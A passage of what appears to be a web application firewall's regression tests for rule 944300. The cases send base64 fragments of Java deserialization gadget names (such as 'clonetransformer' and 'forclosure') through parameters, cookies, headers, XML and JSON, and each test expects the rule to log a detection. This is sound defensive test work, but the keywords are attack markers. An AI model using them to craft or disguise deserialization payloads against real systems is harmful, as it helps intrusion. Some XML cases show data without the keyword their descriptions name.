Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-72 desc: "XML element value 
includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Y2xvbmV0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-73 desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Y2xvbmV0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-74 desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-75 desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" output: log_contains: "id \"944300\"" - test_title: 944300-76 desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-77 desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=GNsb25ldHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-78 desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: 
"en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "GNsb25ldHJhbnNmb3JtZXI=test" output: log_contains: "id \"944300\"" - test_title: 944300-79 desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=GNsb25ldHJhbnNmb3JtZXI method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-80 desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: GNsb25ldHJhbnNmb3JtZXI=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-81 desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: GNsb25ldHJhbnNmb3JtZXI method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id 
\"944300\"" - test_title: 944300-82 desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-83 desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "GNsb25ldHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-84 desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "GNsb25ldHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-85 desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=GNsb25ldHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-86 desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" output: log_contains: "id \"944300\"" - test_title: 944300-87 desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-88 desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: 
"en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=BjbG9uZXRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-89 desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "BjbG9uZXRyYW5zZm9ybWVy=test" output: log_contains: "id \"944300\"" - test_title: 944300-90 desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=BjbG9uZXRyYW5zZm9ybWVy method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-91 desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: BjbG9uZXRyYW5zZm9ybWVy=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 
944300-92 desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: BjbG9uZXRyYW5zZm9ybWVy method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-93 desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-94 desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BjbG9uZXRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-95 desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BjbG9uZXRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-96 desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=BjbG9uZXRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-97 desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" output: log_contains: "id \"944300\"" - test_title: 944300-98 desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" 
Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-99 desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Zm9yY2xvc3VyZQ" output: log_contains: "id \"944300\"" - test_title: 944300-100 desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Zm9yY2xvc3VyZQ=test" output: log_contains: "id \"944300\"" - test_title: 944300-101 desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Zm9yY2xvc3VyZQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-102 desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: 
dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Zm9yY2xvc3VyZQ=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-103 desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Zm9yY2xvc3VyZQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-104 desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-105 desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Zm9yY2xvc3VyZQ" output: log_contains: "id \"944300\"" - test_title: 944300-106 desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Zm9yY2xvc3VyZQ" output: log_contains: "id \"944300\"" - test_title: 944300-107 desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Zm9yY2xvc3VyZQ" output: log_contains: "id \"944300\"" - test_title: 944300-108 desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" output: log_contains: "id \"944300\"" - test_title: 944300-109 desc: "Content-Type 
application/json arg name includes keyword Zm9yY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-110 desc: "Argument test includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=GZvcmNsb3N1cmU" output: log_contains: "id \"944300\"" - test_title: 944300-111 desc: "Argument name includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "GZvcmNsb3N1cmU=test" output: log_contains: "id \"944300\"" - test_title: 944300-112 desc: "Cookie test includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=GZvcmNsb3N1cmU method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-113 desc: "Cookie name includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: GZvcmNsb3N1cmU=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-114 desc: "Request header test includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: GZvcmNsb3N1cmU method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-115 desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: 
"en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-116 desc: "XML element value includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "GZvcmNsb3N1cmU" output: log_contains: "id \"944300\"" - test_title: 944300-117 desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "GZvcmNsb3N1cmU" output: log_contains: "id \"944300\"" - test_title: 944300-118 desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 